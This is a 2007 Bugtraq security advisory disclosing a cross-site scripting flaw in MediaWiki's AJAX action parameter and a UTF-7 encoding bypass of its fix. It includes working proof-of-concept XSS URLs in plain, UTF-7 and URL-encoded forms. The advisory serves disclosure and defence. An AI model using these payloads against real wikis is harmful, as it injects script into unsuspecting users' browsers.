MediaWiki Cross-site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MediaWiki Cross-site Scripting
From: eyal@xxxxxxxxxx
Date: 20 Feb 2007 04:29:01 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

MediaWiki Cross-site Scripting

Vulnerabilities.


Date:
18/02/2007

Vendor:
MediaWiki

Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.

Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack 
by expliting the experimental AJAX features, if enabled (default). This XSS was 
fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix 
can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding 
auto-detection has to be enabled for successful explitation.


Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions. 

Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D
 (URL Encoded) 


Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24

Prev by Date: Re: Jboss vulnerability
Next by Date: qwik-smtpd format string
Previous by thread: TSRT-07-02: Trend Micro ServerProtect eng50.dll Stack Overflow Vulnerabilities
Next by thread: qwik-smtpd format string
Index(es):
- Date
- Thread